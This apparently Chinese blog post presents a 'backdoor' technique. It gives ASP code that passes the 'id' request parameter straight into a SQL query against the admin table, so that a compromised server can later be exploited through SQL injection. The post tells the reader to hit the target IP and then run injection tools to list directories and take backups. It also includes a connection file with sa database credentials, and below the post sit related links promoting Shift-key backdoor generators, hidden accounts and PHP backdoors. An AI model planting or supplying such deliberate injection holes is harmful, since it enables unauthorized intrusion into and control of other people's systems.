`
hunix
  • 浏览: 21853 次
  • 性别: Icon_minigender_1
  • 来自: 孝感
最近访客 更多访客>>
文章分类
社区版块
存档分类
最新评论

超级另类后门 自己构造注入表

阅读更多
<!--#include file="conn.asp"-->
<%
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from admin where id=" & id
rs.open strSQL,conn,1,3
rs.close
%>
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。

然后输入:http://目标IP/zhuru.asp?id=1

就这么简单,然后用注入工具扫描这个注入点,列目录,备份,一切你想做的!

-----------------------------
conn.asp文件代码:
<%
strSQLServerName = "127.0.0.1" '服务器名称或地址
strSQLDBUserName = "sa" '数据库帐号
strSQLDBPassword = "123456789" '数据库密码
strSQLDBName = "db_database" '数据库名称
Set conn = Server.CreateObject("ADODB.Connection")
strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
conn.open strCon
%>

分享到:
评论

相关推荐

    超级Shift后门生成器

    【超级Shift后门生成器】是一款特殊的工具,主要用于创建隐蔽的后门程序,它允许远程访问和控制目标计算机系统。这个工具的名称“超级Shift”可能暗示了它在功能上比常规的后门生成器更加强大和复杂,可能是通过键盘...

    超级shift后门生成器

    【标题】:“超级shift后门生成器” 在IT安全领域,后门生成器是一种工具,通常用于非法目的,它能够创建隐蔽的后门程序。"超级shift后门生成器"这个名字暗示这可能是一个专门用于创建特定类型后门的工具,其中...

    超级模块5.0完美破解[去后门] 绝对安全!

    超级模块5.0完美破解[去后门] 绝对安全! 亲自去的后门! 可以放心使用了!

    VB编写的服务器超级后门使用方法

    【VB编写的服务器超级后门使用方法】 VB(Visual Basic)是微软开发的一种可视化的、面向对象的编程语言,常用于快速开发Windows应用程序。在网络安全领域,VB也被用来编写后门程序,这些程序通常用于非法远程控制...

    啊D注入工具 v2.32 无限制版带Hash验证无后门版

    SQL注入是一种常见的网络安全漏洞,攻击者可以通过在输入框中输入特殊构造的SQL语句,来获取、修改、删除数据库中的敏感信息。这款工具可能包含了一系列的测试用例和策略,能自动扫描Web应用的输入参数,寻找可能的...

    建立超级隐藏账号 一个相当经典的后门

    "建立超级隐藏账号 一个相当经典的后门" 本文将详细介绍如何建立一个超级隐藏账号,以便在系统中创建一个不可检测的后门账号。这个方法利用了注册表的修改和 sam 键的权限更改来实现隐藏账号的创建。 首先,需要...

    超强隐藏Shift后门

    服务器留后门的招。 1、国内的很多机器都是简体中文版,所以我们一般选择 运行安装中文版shift.bat 2、按5次以上shift键,待弹出窗口后 3、点击设置 4、再点击取消,出现小text框 5、输入密码 helloyun 6、再点击...

    给自己的软件添加后门

    本文将详细探讨如何使用C#.NET语言给自己的软件添加后门,特别是通过键盘输入序列(按键后门)实现这一目标。 首先,我们要了解后门的基本概念。后门并不全然是恶意的,它可以是开发者为了方便测试、调试或者在客户...

    几种另类的ASP后门

    本文将详细介绍两种另类的ASP后门类型,并解释其工作原理。 第一种ASP后门示例: ```asp ,sql db="netpatch.asp" dbfile=server.MapPath(db) set ydb=server.CreateObject("ADOX.Catalog") ydb.Create "Provider=...

    c# 给自己软件加后门

    然而,这里提到的"给自己软件加后门"可能是为了监控、调试或者更新目的,而不是为了非法入侵。以下将详细讲解如何在C#程序中实现此类功能,以及涉及的相关知识点: 首先,创建一个后门通常包括以下几个步骤: 1. *...

    vb打造自己的无后门的Shift后门(2动画.rar

    【标题】"vb打造自己的无后门的Shift后门(2动画.rar" 涉及的知识点主要集中在VB(Visual Basic)编程语言上,特别是关于创建后门程序的技术。后门通常是指在软件中预留的秘密访问通道,允许开发者或者特定用户绕过...

    作真正属于自己的后门程序

    1 如何使非常规后门变成exe后门,方便我们使用,这里我们用来演示的后门程序是黑客之门1.0版本。 2 如何修改后门程序躲过杀毒软件(这里拿比较强悍的avp-来自俄罗斯的卡巴斯基 作为例子),这里使用的是修改特征码的...

    wayos324去后门

    wayos324去后门

    自己用python写的后门

    标题提到的“自己用python写的后门”是一个关于利用Python进行隐蔽通信和远程控制的技术实践。 后门通常是指在软件中预留的一种秘密访问通道,允许开发者或攻击者绕过正常的安全机制,获取系统的控制权。在合法情况...

    C# 给自己的软件加后门

    在本讨论中,我们将专注于“C# 给自己的软件加后门”的概念,但必须强调,这仅限于教育目的,不应该在实际应用中实施。 C#是一种广泛使用的面向对象的编程语言,由微软开发,适用于构建各种类型的应用程序,包括...

    Php后门php 后门

    php 后门

    VB编写的服务器超级后门使用方

    wsdsds记录卡即可立即离开家里看见了空间看了

    建立超级影藏后门录像和工具

    在IT安全领域,"后门"是一个非常敏感且重要的主题。后门通常指的是在软件或系统中故意留下的隐藏通道,允许未经授权的访问者...因此,了解后门的工作原理并掌握防范方法是至关重要的,这样才能保护自己的系统免受侵害。

    给自己的软件添加后门 c#实现

    给自己的软件添加后门 c#实现 软件彩蛋我想大家都应该听说过。经典的比如在Excel得某个单元隔里面OOXX就可以获得一个赛车游戏之类。这是一种软件彩蛋,纯属娱乐。但是更多的“彩蛋”被用作软件后门。比如我们提供给...

    php万能后门程序

    4. **加密后门**:使用加密通信,使得后门活动更难被监控。 **PHP后门的危害:** 1. **数据泄露**:攻击者可以窃取敏感信息,如用户数据、商业秘密等。 2. **服务中断**:攻击者可以操纵服务器资源,导致网站崩溃或...

Global site tag (gtag.js) - Google Analytics